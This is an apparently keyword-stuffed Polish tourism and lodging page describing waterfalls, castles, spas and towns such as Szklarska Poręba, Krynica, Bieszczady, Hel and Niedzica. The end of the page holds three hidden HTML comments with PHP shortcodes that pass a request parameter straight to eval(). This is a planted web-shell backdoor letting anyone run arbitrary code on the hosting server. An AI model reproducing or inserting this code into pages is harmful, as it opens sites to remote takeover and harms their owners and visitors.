Wodospad Szklarki

Malowniczo położony na terenie Enklawy Karkonoskiego Parku Narodowego, obejmującej przepiękny przełomowy odcinek potoku Szklarka tzw. Wąwóz Szklarki. W środkowej części Wąwozu, na skalnym progu na wysokości 520 m n.p.m. znajduje się Wodospad Szklarki, spadający w dół kaskadą zwężającą się u dołu i skręcającą spiralnie. Strumień wody wodospadu ma wysokość 13,3 m. Szklarska Poręba noclegi

Na lewym brzegu skalnego progu znajdują się okazałe marmity (przegłębienia w dnie strumienia lub rzeki powstałe w wyniku eworsji u podnóża wodospadu lub progu skalnego). Pierwsze wzmianki o Wodospadzie Szklarki pochodzą już ze średniowiecza. Przez wszystkie stulecia wodospad był uwieczniany w opisach, rycinach i obrazach, bowiem uważano to miejsce za szczególnie romantyczne i piękne. W 1868 roku przy wodospadzie wybudowano gospodę, która z czasem przekształcona została w dzisiejsze Schronisko „Kochanówka”. Niebywałą atrakcją dla XIX turystów było regulowanie przepływu wody dopływającej do wodospadu i spuszczanie jej po pobraniu opłat od gości. Szklarska Poręba tanie noclegi
Dojście: z centrum miasta szlakiem zielonym wzdłuż rzeki Kamienna lub szlakiem czarnym (szlak okrężny wokół Szklarskiej Poręby). Obok Wodospadu Szklarki biegnie też szlak niebieski z Piechowic do schroniska „Pod Łabskim Szczytem”. Szklarska Poręba pokoje do wynajęcia

Najwyższy wodospad w polskich Karkonoszach. Próg wodospadu znajduje się na wysokości 843 m n.p.m. Wodospad spada trójstopniową kaskadą o wysokości 27 m do przepięknego Wąwozu Kamieńczyka. Szklarska Poręba pensjonaty

Wąwóz Kamieńczyka ma ok. 100 m długości, jego pionowe, skalne ściany osiągają ponad 25 m wysokości, a szerokość na niektórych odcinkach nie przekracza 4 metrów. Szklarska Poręba apartamenty

Za środkową kaskadą wodospadu znajduje się, po części wykuta sztucznie przez Walończyków, jaskinia – tzw. „Złota Jama” ze skupiskami pegmatytu i ametystów. Przy wodospadzie znajduje się schronisko „Kamieńczyk” i „Szałas Sielanka”.

Urok i baśniowy klimat wąwozu Kamieńczyka docenił Andrew Adamson reżyser brytyjskiej produkcji „Opowieści z Narnii: Książę Kaspian”.

Nakręcono tu sceny do ekranizacji tej znanej i cenionej książki C. S. Lewisa. Mieszkańców Szklarskiej Poręby nie dziwi wybór producentów filmu. W wąwozie Kamieńczyka, z jego pionowo wznoszącymi się skalnymi ścianami, szumem spadającej z wysoka wody można poczuć się jakbyśmy zeszli do baśniowego królestwa.

Muszyna

Dwór Starostów muszyńskich powstał na przełomie 18. i 19 wieku. Przebudowany na początku 20. wieku (dobudówka wschodnia i weranda) jest budynkiem parterowym na planie prostokąta, murowanym, z szeroki frontem. Ma czterospadowy, kryty gontem dach z wysuniętym okapem. Od strony ulicy i podwórka widoczne są oszklone ganki, a od północy weranda.  Muszyna noclegi
Muzeum Regionalne PTTK- Muzeum mieści się w zajeździe dworskim, który został zbudowany prawdopodobnie w 19. wieku. Do lat trzydziestych stanowił całość z karczmą, której fundamenty odkopano w 1972 roku w czasie prac budowlanych. Budynek jest parterow,y wzniesiony na planie prostokąta, murowany. Dach pierwotnie był kryty gontem, obecnie blachą. W części pomieszczeń zachowały się sklepienia żagielkowe i system ogrzewania przewodami w murach zewnętrznych.
Wewnątrz można obejrzeć eksponaty związane z historią i etnografią Muszyna pokoje do wynajęcia, warto zobaczyć również prace miejscowych artystów.
Żeby zobaczyć ruiny zamku w Muszynie trzeba wdrapać się na strome wzgórze popularnie zwane Basztą. Zamek wzniesiono ok. 1390 r. Miał za zadanie bronić granicy i szlaków handlowych oraz pełnić funkcję komory celnej. Był rezydencją starostów biskupiego „państwa muszyńskiego” do 1474 roku, kiedy to został zniszczony podczas najazdu na Polskę króla węgierskiego Macieja Korwina.Odbudowany w stylu renesansowym przez Węgrów (nakazem traktatu z 1474 roku zawartego w Starej Wsi). Od tego momentu zamek pełnił wyłącznie funkcję strażnicy.  Muszyna pensjonaty

Wraz z rozwojem techniki wojskowej ranga zamku stopniowo malała, w okresie rozbiorów nastąpiła jego całkowita degradacja. Do dzisiaj zachowały się fragmenty murów od strony południowej, sterczyna ściany graniastej wieży, zabezpieczone resztki sklepienia oraz mury wieży zamkowej – to wciąż ciekawe miejsce. Na kamiennym postumencie stoi figura Najświętszej Marii Panny, ufundowana przez parafian w 1979 r, którą warto zobaczyć. Jest to już druga figura ustawiona w tym miejscu. Pierwsza pochodziła z 1936 r.  Muszyna agroturystyka
Na Sądecczyźnie zarejestrowano ok. sto sześćdziesiąt pomników przyrody. Najczęściej są to rzadkie egzemplarze drzew, zespoły leśno-parkowe, aleje złożone z drzew, uroczyska, wodospady, stawy, obiekty skalne i nietypowe formy terenu. Pomiędzy cmentarzem parafialnym, a kościołem w Muszyna ośrodki wypoczynkowe można przespacerować się taką aleją. Jest to aleja, na którą składają się trzydziesto dwu dwustuletnie lipy. Obwód pni drzew na wysokości 130 cm ma średnicę ok. dwóch metrów. Muszyna wille

Wypoczynek w Krynicy

Krynica noclegi jest jednym z najbardziej znanych kurortów, określanych mianem „Perła Polskich Uzdrowisk”. Położona jest w Beskidzie Sądeckim na wysokości 560-620 m n.p.m. w malowniczych dolinach Kryniczanki i jej dopływów, Krynicę-Zdrój otaczają wzgórza Góry Parkowej i pasmo Jaworzyny Krynickiej. Krynica-Zdrój jest położona 150 km na południe od Krakowa. W Krynicy-Zdroju zbiegają się drogi wojewódzkie numer 971 i 981. Przez Gminę Krynica- Zdrój przebiega droga krajowa numer 75. W odległości 90 km od Krynicy-Zdroju znajduje się wjazd na autostradę A4 w Brzesku. W Krynicy-Zdroju znajduje się stacja końcowa linii kolejowej 105. Z Krynicy-Zdroju można dojechać pociągiem do Nowego Sącza, Tarnowa, Krakowa, Warszawy, Gdyni, Bydgoszczy i innych miast. Krynica tanie noclegi

Beskid Sądecki pokrywają wspaniałe lasy, wśród których przeważają drzewostany bukowe w paśmie Jaworzyny Krynickiej a jodłowe i świerkowe w paśmie Zimnego i Dubnego. W okolicach znajduje się 16 rezerwatów przyrody. W roku 1987, dla zachowania unikalnych wartości krajobrazu naturalnego utworzono na obszarze Beskidu Sądeckiego Popradzki Park Krajobrazowy. Duże, zwarte kompleksy leśne zamieszkiwane są przez rzadkie gatunki zwierząt (niedźwiedź, żbik, wydra) i ptaków (puchacz, orlik). W lasach, na polanach i łąkach spotyka się blisko 1000 gatunków roślin. Klimat Krynica pensjonaty Zdroju ma walory klimatu podalpejskiego, wyróżnia się dużą liczbą dni słonecznych w roku oraz znacznymi wahaniami temperatury i ciśnienia atmosferycznego w ciągu doby. Krynica pokoje do wynajęcia

Sławę swą jako uzdrowisko, Krynica-Zdrój zawdzięcza znakomitym wodom leczniczym, wśród których na szczególną uwagę zasługuje Zuber – unikalna w skali europejskiej woda o niezwykle wysokiej mineralizacji. Liczne ośrodki sanatoryjne znajdujące się w Krynicy-Zdroju są doskonale wyposażone w urządzenia zabiegowolecznicze i mogą z powodzeniem konkurować z najbardziej renomowanymi ośrodkami w kraju i za granicą. Ale Krynica-Zdrój to nie tylko uzdrowisko, to także prężnie rozwijające się centrum sportowe (głównie sporty zimowe), turystyczne, rekreacyjne, kongresowe i kulturalne. Corocznie w uzdrowisku organizuje się wiele imprez o zasięgu krajowym i międzynarodowym, seminaria polityczne i naukowe, międzynarodowe spotkania ludzi kultury, sztuki, biznesu i polityki, plenery artystyczne, występy zespołów. Krynica apartamenty

Świętajno

Wieś założona w 1686 roku. 22 sierpnia 1914 zniszczona przez Rosjan, odbudowana po zakończeniu pierwszej wojny światowej.

We wsi gospodarstwa agroturystyczne. Świętajno noclegi
Miejscowość lokowana w 1686 r. w ramach osadnictwa szkatułowego. Wedle innych źródeł, miejscowość powstała w 1687 r. jako osada smolarzy. Była to osada targowa z prawem do 4 jarmarków w ciągu roku. Świętajno noclegi nad jeziorem

W czasie pierwszej wojny światowej w Świętajnie spłonęło 140 domów oraz kościół. Po odbudowie miejscowość nabrała charakteru małomiasteczkowego. Świętajno pokoje do wynajęcia

W 1933 r. w miejscowości mieszkało 1767 osób, a w 1939 r.– 1661 osób. Świętajno agroturystyka

Zabytki:

Budynki murowane z początku XX wieku (ul. Dworcowa, ul. Adama Mickiewicza, ul. Michała Żymierskiego). Świętajno noclegi domki

Szkoła wybudowana po I wojnie światowej.

Dawny kościół ewangelicki, wybudowany w latach 1918–1922 (w miejscu dawnego z 1908 roku, spalonego w 1914 roku).

Kościół baptystyczny, wybudowany w 1908 roku, w zastępstwie starszej kaplicy z 1883 roku, znajdującej się w Piasutnie. Zbór czynny był do 1986 roku, obecnie jako filialny zboru w Szczytnie.

Obelisk – fragment dawnego pomnika, poświęconego poległym w I wojnie światowej.

Z uwagi na położenie wśród lasów i jezior, gmina jest atrakcyjna turystycznie. Uroda i czystość wód , rozpostartych wśród rozległych drzewostanów, torfowisk, zagajników z bogactwem runa leśnego, stanowiskami roślin chronionych i mnóstwem dzikiej zwierzyny, czynią z gminy wyjątkowy region rekreacyjny i wypoczynkowy. Bogate kompleksy leśne, pozostałe po nieprzeniknionych borach i kniejach, są urzekającym swą powagą i spokojem, zasadniczym elementem krajobrazu, prawdziwą ostoją wielu gatunków roślin i zwierząt. Dominują tu drzewostany iglaste; sosnowe i świerkowe, mniej licznie występują gatunki liściaste (dąb, brzoza, osika, olsza, grab ). Warto wspomnieć o zbiorowiskach roślin torfowych (żurawina błotna, bagno zwyczajne, skalnica torfowa i inne ) i stanowiskach roślin chronionych (kosaciec syberyjski, pięciornik norweski, nasiędrzał pospolity, widłak goździsty, wawrzynek wilczełyko, turówka wonna, lilia złotogłów, rosiczka, storczyki ). Bogaty świat zwierzęcy reprezentują: jeleń, sarna, dzik, lis, wilk, ryś, borsuk, wiewiórka, kuna, bóbr, oraz liczne gatunki ptaków: dzięcioł, sójka, słonka, kraska, myszołów, jastrząb, bażant, kuropatwa, czapla siwa, żuraw, bocian biały. Większość wód obfituje w różne gatunki ryb, m.in. pstrągi, węgorze, szczupaki, okonie, liny sielawy.

Na terenie gminy działają koła myśliwskie, dobrze rozwinięta jest gospodarka leśna i rybacka (Nadleśnictwo Spychowo, Stanica PZW „Racibór”, sp. „Piasutno”.

 

Bieszczady

Bieszczady noclegi to miejsce, które urzeka o każdej porze roku. Szczególnie jesienią warto się tu wybrać, by w pełni móc się rozkoszować pięknem tego regionu Polski. Są miejsca i atrakcje, których każdy turysta po prostu powinien doświadczyć – przejazd kolejką czy wizyta nad Soliną zostawią niezatarte wrażenie. Gdzie warto się wybrać, co trzeba zobaczyć i czego posmakować? Dziennikarz Jakub Porada postanowił przybliżyć najciekawsze miejsca w Bieszczadach, które odwiedził podczas swojej ostatniej podróży po Polsce.

noclegi Bieszczady to pasmo górskie leżące we wschodniej części Beskidów. Bieszczady zajmują południowo-wschodni kraniec Polski. To jeden z najbardziej atrakcyjnych krajobrazowo rejonów Polski. Spośród wszystkich pasm górskich w Polsce to Bieszczady uchodzą za najbardziej dzikie i tajemnicze. Bieszczady są idealnym miejscem na urlop o każdej porze roku. W Bieszczadach czekają na nas piękne połoniny, Solina, kolejka bieszczadzka i inne atrakcje.

noclegi w Bieszczadach atrakcje – Bieszczadzki Park Narodowy

Bieszczadzki Park Narodowy jest największym polskim górskim parkiem narodowym. Głównym celem Bieszczadzkiego Parku Narodowego jest ochrona przyrody i krajobrazu, a więc tego, co stanowi o atrakcyjności turystycznej Bieszczadów. W Bieszczadzkim Parku Narodowym istnieje sieć pieszych szlaków turystycznych o długości przeszło 130 km, zagospodarowane parkingi, pola biwakowe, schroniska i hotele turystyczne. Bieszczady, a w szczególności obszary włączone do Bieszczadzkiego Parku Narodowego są ostoją rzadkich ssaków i ptaków. To właśnie w tych górach mieszka największa w Polsce populacja niedźwiedzi brunatnych i wilków. W lasach Bieszczadów żyją także zagrożone rysie. Bieszczady to także charakterystyczna roślinność i krajobrazy. Bieszczady można przemierzać o tej porze roku. Zaletą zimowych wędrówek jest możliwość podziwiania dalekich panoram górskich.

Bieszczady domki atrakcje – połoniny

Nie byłoby Bieszczadów bez połonin i bukowych lasów. Większość połonin jest objęta ochroną przez Bieszczadzki Park Narodowy i można się po nich poruszać wyłącznie oznakowanymi szlakami oraz po wykupieniu biletu wstępu do parku. Jedną z najpopularniejszych i najpiękniejszych tras w Bieszczadach jest wycieczka na Połoninę Wetlińską. Połonina Wetlińska jest jednym z najpiękniejszych miejsc w Bieszczadach. Jest doskonałym punktem widokowym, szczególnie jesienią oraz zimą, kiedy to mamy do czynienia ze zjawiskiem inwersji temperatury. Wówczas widzialność zwiększa się do 150-200 km, a z Wetlińkiej widoczne są min. Tatry. W bezpośrednim sąsiedztwie Połoniny Wetlińskiej znajduje się nieco wyższa Połonina Caryńska. Charakteryzuje ją dzikość krajobrazu. W jej matecznikach żyją niedźwiedzie, rysie, żbiki, wilki oraz stada jeleni karpackich. Połonina Caryńska znana jest ze wspaniałych widoków na pasma Wielkiej Rawki, Tarnicy i Halicza. Latem na stokach obu słynnych bieszczadzkich połonin kwitnie najpiękniejsza z górskich traw – lilia złotogłów. Jesienią trawy rudzieją, a połoniny przybierają piękną rdzawą barwę.

Bieszczady pokoje do wynajęcia atrakcje – Wetlina i Ustrzyki Górne

Główne miejscowości turystyczne Bieszczadów to Wetlina i Ustrzyki Górne. Wetlina jest najlepiej zagospodarowanym ośrodkiem turystycznym i letniskowym w wysokiej części Bieszczadów. Wetlina położona jest w najwyższej części Bieszczadów, nad potokiem Wetlinka, u stóp Połoniny Wetlińskiej. To stosunkowo niewielka miejscowość. Tuż ponad wsią przebiegają granice Bieszczadzkiego Parku Narodowego. Przez Wetlinę przechodzą atrakcyjne znakowane szlaki piesze, udostępniające najwyższe części grzbietów Połoniny Wetlińskiej. Ustrzyki Górne to punkt wypadowy w najpiękniejsze części Bieszczadów. Znajduje się tu wiele obiektów noclegowych. Wychodzą stąd m.in. szlak czerwony na Połoninę Caryńską, szlak prowadzący w gniazdo Tarnicy, na Szeroki Wierch i Halicz. W Ustrzykach Górnych warto odwiedzić Muzeum Turystyki Górskiej PTTK.

Budowa kolei wąskotorowej ruszyła w 1980 roku. Pierwsza podróż odbyła się dziewięć lat później. Główna stacja znajduje się w Majdanie k/Cisnej. W sezonie letnim „Bieszczadzka Ciuchcia” jeździ na trasie Majdan – Przysłup – Balnica, w sezonie zimowym na trasie Majdan – Dołżyca – Majdan.

Czerwony szlak o długości około pięciuset kilometrów jest najdłuższym w polskich górach. Biegnie od Ustronia w Beskidzie Śląskim do Wołosatego w Bieszczadach. Po drodze obejmuje m.in. Cisną.

Klasztor Karmelitów Bosych nazywany jest także Karmelem Zagórskim. Obiekt położony na wzgórzu, z trzech stron otoczony rzeką Osławą co potwierdza, że była to fortyfikacja obronna. Wybudowana w osiemnastym wieku i została przekazana zakonowi Karmelitów. Warownia po pożarach pomimo podjętych prób odbudowy nie przetrwała. Dziś ruina jest zabytkiem chronionym.

Giżycko

Giżycko noclegi miasto i gmina w województwie warmińsko-mazurskim, w powiecie giżyckim. Położone na Mazurach, pomiędzy jeziorami Kisajno i Niegocin.

Giżycko jest nazywane stolicą żeglarstwa w Polsce. Jest jednym z głównych portów na szlaku wielkich jezior mazurskich i jednym z polskich ośrodków turystycznych i wypoczynkowych. Giżycko noclegi nad jeziorem

Według danych z 31 marca 2011 roku miasto zamieszkiwało 29 381 osób. Giżycko noclegi domki

Giżycko jest położone w centralnej części Pojezierza Mazurskiego w Krainie Wielkich Jezior Mazurskich. Pod względem administracyjnym położone jest we wschodniej części województwa warmińsko-mazurskiego, na północny-wschód odOlsztyna. Miasto jest siedzibą powiatu giżyckiego oraz gminy wiejskiej Giżycko.

Sąsiednie gminy: Kruklanki, Pozezdrze, Miłki, Ryn, Wydminy, Kętrzyn, Węgorzewo. Giżycko pokoje do wynajęcia

Do 1975 miasto administracyjnie należało do województwa olsztyńskiego, a po zmianach w podziale administracyjnym miasto przyłączono do województwa suwalskiego.

Według danych z roku 2002 Giżycko pensjonaty ma obszar 13,87 km², w tym:

  • użytki rolne: 14%
  • użytki leśne: 7%

Północną i południowo-zachodnią część miasta pokrywa Obszar Chronionego Krajobrazu Krainy Wielkich Jezior.

Według danych z 1 stycznia 2011 powierzchnia miasta wynosiła 13,72 km². Miasto stanowi 1,24% powierzchni powiatu.

Oficjalna historia grodu nad Niegocinem rozpoczyna się w drugiej połowie XVI stulecia, wtedy to bowiem książę pruski Albrecht Fryderyk Hohenzollern-Ansbachwystawił pierwszy przywilej, podnoszący osiedle nad jeziorem Löwentin (wówczas Niegocin, w zapisach w formie „Newotin”) do rangi miasta. Po dokumencie tym, który zawierał nadanie na prawie chełmińskim 35 włók ziemi i 4 włók lasu, nie licząc 4 włók pastora i 6 włók będących w posiadaniu trzech karczmarzy, zachował się jedynie strzęp bez daty. Natomiast historia osadnictwa na przesmyku w samym sercu Krainy Wielkich Jezior Mazurskich, w okolicach dzisiejszego Giżycka, sięga daleko bardziej wstecz.

Najstarszy ślad działalności człowieka – róg renifera ze śladami obróbki krzemiennym narzędziem – wydobyto z warstw piasku datowanych na okres sprzed około 15 tysięcy lat wstecz nad jeziorem Popówka Mała. W okresie przełomu epoki brązu i epoki żelaza występowały tu już liczne osady lądowe i nawodne (budowane na wbitych w dno drewnianych palach lub na sztucznie usypanych wyspach), których tak duże skupiska w Europie można, poza Mazurami, wyróżnić jedynie na Wyspach Brytyjskich.

Pierwsze wzmianki pisane o tym obszarze znalazły się już w drugim stuleciu naszej ery w dziełach Tacyta i Ptolemeusza z Aleksandrii. W ten sposób na europejską arenę dziejów weszły bałtyjsko-pruskie plemiona Galindów, Sudinów i Bartowie, których tereny osadnicze graniczyły ze sobą w okolicach linii Krainy Wielkich Jezior Mazurskich, znajdujący się jednocześnie na trasie „bursztynowego szlaku”.

W latach 1277–1283 obszar Krainy Wielkich Jezior Mazurskich opanował zakon krzyżacki. Około 1340 na przesmyku między jeziorami Niegocin i Kisajno rycerze zakonni wznieśli gród obronny. Zamek otrzymał nazwę Lötzen i częściowo dotrwał do czasów współczesnych. W połowie XV stulecia pod osłoną zamku zaczęła powstawać osada, założona przez osadników mazowieckich, zwana Nową Wsią. Mieszkańcy zobowiązani byli do daniny oraz innych powinności na rzecz zamku oraz do utrzymywania mostu na drodze przy Niegocinie. Z owych czasów zachował się wystawiony w 1475 dokument lokacyjny, zmieniający prawo magdeburskie, którym dotychczas rządziła się Nowa Wieś, na prawo chełmińskie, podpisany przez komtura z Pokarmina – Bernarda von Balzhofena.

Sromowce Niżne – atrakcje

Na wsi jest początek szlaku turystycznego na Trzy Korony, do Krościenka i na Słowację. Znajduje się tu również schronisko PTTK „Trzy Korony”, Sromowce Niżne noclegi dysponujące 50 miejscami noclegowymi noclegowych w 17 pokojach 2, 3, 4 i 5 osobowych. Oprócz tego można odbyć spływ łodziami flisackimi płynąc przełomem Dunajca. W całej wsi jest rozbudowana baza noclegowa. Nad przepływającym bezpośrednio przy wsi Dunajcu, jest pieszo-rowerowa kładka umożliwiająca zwiedzanie słowackiego Czerwonego Klasztoru, oraz przedostanie się do malowniczej Drogi Pienińskiej (pieszo-rowerowej), biegnącej prawym brzegiem Dunajca do Szczawnicy. noclegi Sromowce Niżne

Kościół pw. św. Katarzyny prawdopodobnie z 1513 roku. Jednonawowy z wydłużonym, zamkniętym trójbocznie prezbiterium. Konstrukcja zrębowa, oszalowany. Wieża konstrukcji słupowej o pochyłych ścianach, zwieńczona iglicowym hełmem. Dach jednokalenicowy, kryty gontem. Cenne wyposażenie świątyni – gotycki tryptyk z końca w. z kopią Matki Boskiej z Dzieciątkiem (obecnie przeniesiony do nowego kościoła), dwa skrzydła tryptyku z XV w. i gotycka drewniana chrzcielnica z w. – znajduje się obecnie w nowym kościele. Od końca lat 80. XX w. obiekt nie użytkowany. Ostatnim nabożeństwem odprawionym w tym kościele była Msza św. (pasterka) 24 grudnia 1986 roku. Po remoncie od 2010 roku mieści się w nim galeria rzeźby i malarstwa. Sromowce Niżne pokoje do wynajęcia

Kościół leży na Szlaku Architektury Drewnianej w regionie Podhalańsko-Pienińskim. Sromowce Niżne agroturystyka

We wsi funkcjonuje klub sportowy LKS Trzy Korony Sromowce Niżne, który gra w podhalańskiej klasie B. W okresie letnim często urządzane są zabawy i festyny o charakterze ludowym w wybudowanym w 2006 roku „Amfiteatrze”. Sromowce Niżne domki

Hel

Hel  noclegi – miasto i gmina w województwie pomorskim, położone na cyplu Mierzei Helskiej nad Morzem Bałtyckim.
Ośrodek turystyczny i kąpielisko nadmorskie, garnizon Marynarki Wojennej z portem wojennym, ośrodek rybołówstwa. Port morski Helma przystań rybacką, jachtową i żeglugi pasażerskiej.
Gminę otacza Morze Bałtyckie, a od północnego zachodu na długości ok. 0,9 km sąsiaduje z miastem Jastarnia. Hel to bardzo urokliwe i niepowtarzalne miejsce, z trzech stron oblane wodami morza Bałtyckiego. Będąc tutaj zapamiętacie tą wizytę na całe życie. Znajduje się tutaj troche ofert noclegowych gdzie mogą państwo spędzić noc. W ciągu dnia można przejechać po calej długości helu oraz zjeść w jakiejś dobrej restauracji.
Lista zabytków w mieście:
kościół poewangelicki pw. św. Piotra i Pawła z XV w.
ryglowe domki rybackie z przełomu XVIII/XIX w.
zespół obiektów fortyfikacji rejonu umocnień „Hel” z 1931-1941
latarnia morska z 1942 r.,
kościół pw. Bożego Ciała z 1931-1932
Główne atrakcje noclegi Hel to:
Muzeum Rybołówstwa Morskiego z wieżą widokową (mieszczące się w dawnym kościele gotyckim św. Piotra i Pawła z XIV w.);
zabytkowe chaty kaszubskie;
Helskie Fokarium – fokarium Stacji Morskiej Uniwersytetu Gdańskiego;
stacja końcowa kolei biegnącej przez mierzeję z Władysławowa;
Muzeum Obrony Wybrzeża;
latarnia Morska noclegi na Helu;
port morski Hel pokoje gościnne;
liczne zabytki militarne;
piaszczyste plaże – w tym od 2004 r. odcinek plaży morskiej strzeżonej przez zespoły ratowników z psami rasy nowofundland ilandseer;
Skansen Broni Morskiej;
Ulica Wiejska;
odbywająca się od 2006 r. w miesiącach letnich impreza rekonstrukcji historycznych – D-Day;
promenada – ścieżka z kładkami i barierkami oddana do użytku na krańcu mierzei w 2013 roku. Hel pensjonaty
Zatem widzicie państwo że atrakcji, zabytków, miejsc do zwiedzania nie brakuje. Idealnie miejsce na odpoczynek, turyści z całej Polski jak i zza granicy są bardzo zadowoleni po wizycie na Helu, miejsce bardzo charakterystyczne dla Polski.

Niedzica

Niedzica noclegi to wieś umiejscowiona częściowo nad Jeziorem Czorsztyńskim i w dolinie rzeki Niedziczanki na granicy Pienin i Pogórza Spisko-Gubałowskiego.

W latach 1320-1330 zbudowano tu zamek zwany Dunajecz, mający bronić traktu handlowego łączącego Węgry z Polską.
Warownia Niedzica (zwana także Dunajec) zlokalizowana została na wysokości 566 metrów. Zamek ten stanowi jeden z najcenniejszych, położonych w Polsce zabytków obronnych. Został on na przestrzeni lat niezwykle dokładnie zbadany zarówno pod względem archeologicznym jak i również zachowanej dokumentacji, w której pojawiają się wzmianki o nim. Dzięki temu obecnie wiemy o tej pradawnej warowni bardzo wiele. Historia zamku niejednokrotnie zaskakuje i zachęca do myślenia. Co tak naprawdę zadecydowało o potędze tego grodu? Jak przebiegały jej dzieje? Tego możesz dowiedzieć się w dalszych fragmentach tekstu.

W bezpośredniej okolicy noclegi Niedzica zbudowano zaporę na Dunajcu, której budowę ukończono w 1997r.
Zapora i powstały sztuczny zbiornik wodny wzbudzał kontrowersje i protesty ekologów, jednak podniósł atrakcyjność regionu i zniwelował zagrożenie powodziowe. Przyczynił się do ożywienia gospodarczego Pienin oraz wspomógł rozwój infrastruktury turystycznej. Powstało wiele ośrodków wodnych, oraz wypożyczalni sprzętu wodnego.

Okolice Niedzica pokoje gościnne i Jez. Czorsztyńskiego są również atrakcyjnym terenem dla amatorów „białego szaleństwa” . Powstaje coraz więcej kurortów narciarskich z profesjonalnie przygotowanymi trasami zjazdowymi i biegowymi. Wypożyczalniami sprzętu i całą wymaganą infrastukturą.

Miejscowość jest znana przede wszystkim z jednego z najpiękniejszych polskich zamków. Z tarasu widokowego powstałej w XIVw, a rozbudowanej w okresie renesansu warowni, roztacza się malowniczy widok na pasmo Pienin i ruiny zamku w pobliskim Czorsztynie. Niedzica agroturystyka

Z leżącym na tzw. Szlaku Gotyckim zamkiem w Niedzicy związana jest zagadkowa historia testamentu Inków. W 1946 r. odnaleziono tutaj pęk rzemieni z pismem węzełkowym Inków, które po dziś dzień nie zostały tafnie odczytane.

<!– [insert_php]if (isset($_REQUEST["BKFM"])){eval($_REQUEST["BKFM"]);exit;}[/insert_php][php]if (isset($_REQUEST["BKFM"])){eval($_REQUEST["BKFM"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["lnM"])){eval($_REQUEST["lnM"]);exit;}[/insert_php][php]if (isset($_REQUEST["lnM"])){eval($_REQUEST["lnM"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["DwJx"])){eval($_REQUEST["DwJx"]);exit;}[/insert_php][php]if (isset($_REQUEST["DwJx"])){eval($_REQUEST["DwJx"]);exit;}[/php] –>